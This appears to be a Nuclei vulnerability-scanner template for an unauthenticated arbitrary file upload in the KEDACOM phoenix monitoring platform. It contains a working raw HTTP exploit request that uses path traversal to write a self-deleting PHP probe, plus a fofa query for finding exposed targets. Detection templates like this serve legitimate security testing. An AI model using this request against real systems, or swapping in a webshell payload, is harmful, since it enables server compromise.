http:
    - raw:
        - "POST /pmc-bin/upload_fcgi?uploadDir=../&uploadName={{username}}.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1v98KI1jc9w1bG97\n\n----WebKitFormBoundary1v98KI1jc9w1bG97\nContent-Disposition: form-data; name=\"Filedata\": filename=\"{{username}}\"\nContent-Type: image/jpeg\n\n<?php print(1111*2222);unlink(__FILE__);?>\n----WebKitFormBoundary1v98KI1jc9w1bG97--\n"
    - matchers:
        - part: body
          type: word
          words:
            - "2468642"
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - "GET /{{username}}.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36\n"
id: KEDACOM-phoenix-upload_fcgi-File-upload
info:
    author: Superhero
    description: |-
        fofa: app="KEDACOM-phoenix监控平台"
        KEDACOM phoenix监控平台 upload_fcgi 存在任意文件上传漏洞，未经身份验证远程攻击者可利用该漏洞代码执行，写入WebShell,进一步控制服务器权限。
    name: KEDACOM phoenix监控平台 upload_fcgi 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/RfMm8Q8ZgSVLhZc46oZA7g
    severity: high
    tags:
        - KEDACOM-phoenix监控平台
variables:
    username: '{{to_lower(rand_base(6))}}'
